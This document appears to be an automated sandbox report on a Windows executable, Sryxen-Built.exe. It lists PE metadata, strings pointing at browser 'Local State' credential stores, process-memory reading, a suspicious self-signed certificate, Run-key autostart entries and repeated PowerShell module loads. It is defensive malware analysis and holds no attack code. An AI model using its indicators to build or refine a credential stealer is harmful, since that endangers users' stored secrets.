Source: Sryxen-Built.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: Sryxen-Built.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\ source: Sryxen-Built.exe, 00000000.00000003.1307854444.00000273000F4000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1308113785.0000027300110000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1299378533.00000273000F4000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ntkrnlmp.pdbrppDa source: Sryxen-Built.exe, 00000000.00000003.1319116681.00000273000FF000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1318964444.00000273000F4000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831State\*` source: Sryxen-Built.exe, 00000000.00000003.1319250304.00000273000F4000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1318964444.00000273000F4000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\eh source: Sryxen-Built.exe, 00000000.00000003.1319777506.0000027300111000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1319763400.0000027300110000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1319116681.00000273000FF000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1319851214.0000027300115000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1319623446.000002730010D000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1318964444.00000273000F4000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1319171512.000002730010B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\e, source: Sryxen-Built.exe, 00000000.00000003.1319250304.00000273000F4000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1318964444.00000273000F4000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\User Data\Local State*tet source: Sryxen-Built.exe, 00000000.00000003.1318964444.00000273000C4000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1319250304.00000273000D1000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ntkrnlmp.pdb<AppCache133858168207041016.txt source: Sryxen-Built.exe, 00000000.00000003.1318964444.00000273000E0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdbe\* source: Sryxen-Built.exe, 00000000.00000003.1323103546.00000273000DA000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1323031792.00000273000C5000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1322632976.00000273000C4000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1322726283.00000273000D4000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2a source: Sryxen-Built.exe, 00000000.00000003.1325295799.00000273000DA000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: winload_prod.pdb source: Sryxen-Built.exe, 00000000.00000003.1318964444.00000273000E0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ta\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\*u source: Sryxen-Built.exe, 00000000.00000003.1319570221.00000273000F4000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1319806336.00000273000FD000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\*te/ source: Sryxen-Built.exe, 00000000.00000003.1319923806.0000027300111000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1319777506.0000027300111000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1319763400.0000027300110000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1319116681.00000273000FF000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1319623446.000002730010D000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1318964444.00000273000F4000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1319171512.000002730010B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: d_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\e, source: Sryxen-Built.exe, 00000000.00000003.1319570221.00000273000F4000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1319806336.00000273000FD000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdbO0# source: Sryxen-Built.exe, 00000000.00000003.1318964444.00000273000C4000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1323702315.00000273000CB000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1323031792.00000273000C5000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1322632976.00000273000C4000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1319835500.00000273000C6000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2te** source: Sryxen-Built.exe, 00000000.00000003.1319250304.00000273000F4000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1318964444.00000273000F4000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdbtManagementSDK\Local Stateages\c5e252 source: Sryxen-Built.exe, 00000000.00000003.1300071369.00000273000DC000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1300002033.00000273000D1000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831ataState source: Sryxen-Built.exe, 00000000.00000003.1303413654.0000027300115000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\*{ source: Sryxen-Built.exe, 00000000.00000003.1307854444.00000273000F4000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1311546341.00000273000FD000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1308537853.00000273000F4000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1309645577.00000273000F4000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1310376586.00000273000F5000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1308865721.00000273000F4000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdbtateanag source: Sryxen-Built.exe, 00000000.00000003.1303981152.00000273000C5000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1304546053.00000273000C7000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1302987863.00000273000BE000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831Data source: Sryxen-Built.exe, 00000000.00000003.1300184374.00000273000DF000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1300071369.00000273000DC000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1300002033.00000273000D1000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831okiese\*f source: Sryxen-Built.exe, 00000000.00000003.1325595785.000002730011B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\*2 source: Sryxen-Built.exe, 00000000.00000003.1319250304.00000273000F4000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1319570221.00000273000F4000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1318964444.00000273000F4000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1319806336.00000273000FD000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pd source: Sryxen-Built.exe, 00000000.00000003.1303287287.00000273000D5000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1302905777.00000273000D3000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1300485113.00000273000D5000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056E source: Sryxen-Built.exe, 00000000.00000003.1303884807.0000027300116000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\y\* source: Sryxen-Built.exe, 00000000.00000003.1303884807.0000027300112000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1304130127.0000027300112000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831ate\*e\*b source: Sryxen-Built.exe, 00000000.00000003.1322456921.0000027300100000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17} source: Sryxen-Built.exe, 00000000.00000003.1319570221.00000273000F4000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1319806336.00000273000FD000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\Local State* source: Sryxen-Built.exe, 00000000.00000003.1376698055.00000273002E4000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1376905311.00000273002E9000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 State source: Sryxen-Built.exe, 00000000.00000003.1303413654.0000027300115000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdbs.dat source: Sryxen-Built.exe, 00000000.00000003.1303884807.0000027300112000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1304130127.0000027300112000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\Local Stateon source: Sryxen-Built.exe, 00000000.00000003.1318924220.0000027300129000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdbte source: Sryxen-Built.exe, 00000000.00000003.1322632976.00000273000C4000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\Local Statetate source: Sryxen-Built.exe, 00000000.00000003.1300002033.00000273000F4000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1300071369.00000273000F4000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1300106421.00000273000F6000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2ate source: Sryxen-Built.exe, 00000000.00000003.1318964444.00000273000C4000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1319250304.00000273000D1000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2State source: Sryxen-Built.exe, 00000000.00000003.1322456921.0000027300100000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831State*te source: Sryxen-Built.exe, 00000000.00000003.1307854444.00000273000F4000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1308537853.00000273000F4000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1309645577.00000273000F4000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1310376586.00000273000F5000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1308865721.00000273000F4000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2s\*te source: Sryxen-Built.exe, 00000000.00000003.1319250304.00000273000F4000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1318964444.00000273000F4000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2e\*eW6 source: Sryxen-Built.exe, 00000000.00000003.1307854444.00000273000C4000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\eState source: Sryxen-Built.exe, 00000000.00000003.1319250304.00000273000F4000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1318964444.00000273000F4000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831ngState\* source: Sryxen-Built.exe, 00000000.00000003.1299341204.00000273000D8000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1299378533.00000273000DC000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\* source: Sryxen-Built.exe, 00000000.00000003.1318964444.00000273000C4000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb2658 source: Sryxen-Built.exe, 00000000.00000003.1302987863.00000273000BE000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\Local Statete\* source: Sryxen-Built.exe, 00000000.00000003.1376698055.00000273002E4000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1376905311.00000273002E9000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\enses\Local Stateatee6 source: Sryxen-Built.exe, 00000000.00000003.1297909339.0000027300107000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1297889178.0000027300101000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: Sryxen-Built.exe, 00000000.00000003.1376501041.00000273002EA000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1319570221.00000273000F4000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1376698055.00000273002EB000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1376398317.00000273002E1000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1376811787.00000273002F4000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1319806336.00000273000FD000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\Local Statetate* source: Sryxen-Built.exe, 00000000.00000003.1318924220.0000027300129000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\User Data\Local Statetate4 source: Sryxen-Built.exe, 00000000.00000003.1318964444.00000273000C4000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1319250304.00000273000D1000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\Local State source: Sryxen-Built.exe, 00000000.00000003.1319116681.00000273000FF000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1318964444.00000273000F4000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1319171512.000002730010B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdbs\tate&)` source: Sryxen-Built.exe, 00000000.00000003.1300002033.00000273000D1000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\***p source: Sryxen-Built.exe, 00000000.00000003.1303947102.0000027300108000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1304159912.0000027300108000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\*ew source: Sryxen-Built.exe, 00000000.00000003.1303884807.0000027300112000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1304130127.0000027300112000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: Uninstall-PerUser_2025-03-07_103157_8ac-16f4.log.pdbjon source: Sryxen-Built.exe, 00000000.00000003.1318964444.00000273000C4000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\*u source: Sryxen-Built.exe, 00000000.00000003.1319250304.00000273000F4000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1318964444.00000273000F4000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\*a source: Sryxen-Built.exe, 00000000.00000003.1319250304.00000273000F4000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1318964444.00000273000F4000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\User Data\*n* source: Sryxen-Built.exe, 00000000.00000003.1318924220.0000027300129000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb source: Sryxen-Built.exe, 00000000.00000003.1325295799.00000273000DA000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1325746295.00000273000DB000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\User Datatatee source: Sryxen-Built.exe, 00000000.00000003.1318924220.0000027300129000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\*. source: Sryxen-Built.exe, 00000000.00000003.1299341204.00000273000D8000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1299378533.00000273000DC000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdbte source: Sryxen-Built.exe, 00000000.00000003.1323103546.00000273000DA000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1318964444.00000273000C4000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1323031792.00000273000C5000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1322632976.00000273000C4000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1322726283.00000273000D4000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831tetete source: Sryxen-Built.exe, 00000000.00000003.1325269713.0000027300115000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1325595785.000002730011B000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1325153577.0000027300110000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: e7b466d5-50e5-406a-8ec7-bccc33cd9768.up_meta_body.pdb\ source: Sryxen-Built.exe, 00000000.00000003.1308726433.0000027300111000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1309593143.0000027300111000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\User Data\Local Stateeay source: Sryxen-Built.exe, 00000000.00000003.1318964444.00000273000C4000.00000004.00000020.00020000.00000000.sdmp, Sryxen-Built.exe, 00000000.00000003.1319835500.00000273000C6000.00000004.00000020.00020000.00000000.sdmp
Source: Sryxen-Built.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: Sryxen-Built.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: Sryxen-Built.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: Sryxen-Built.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: Sryxen-Built.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
Source: C:\Users\user\Desktop\Sryxen-Built.exeCode function: 0_2_00007FF6F63C4870 LoadLibraryW,GetProcAddress,NtQueryInformationProcess,ReadProcessMemory,0_2_00007FF6F63C4870

Persistence and Installation Behavior

barindex
AI detected suspicious PE digital signature
Source: Initial sampleJoe Sandbox AI: Detected suspicious elements in PE signature: Multiple suspicious indicators present: 1) Self-signed certificate where issuer and subject are both simply 'Oracle' without proper organizational details 2) Certificate validation failed with untrusted root certificate error 3) Very long validity period extending to 2039, which is unusual for legitimate certificates 4) While Oracle is a known company, legitimate Oracle certificates include full organizational details and proper chain of trust 5) Compilation timestamp (Mar 8, 2025) is very recent and close to the certificate's 'Not before' date (Mar 8, 2025), suggesting possible recent malicious compilation 6) The simplistic 'CN=Oracle' without additional identifiers like organization, country, or email is highly suspicious for a company of Oracle's size and reputation
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run MicrosoftEdgeAutoLaunch_C366A24065C39A1BE76E148DC2D0A868Jump to behavior
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run MicrosoftEdgeAutoLaunch_C366A24065C39A1BE76E148DC2D0A868Jump to behavior

Hooking and other Techniques for Hiding and Protection

barindex
Loading BitLocker PowerShell Module
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
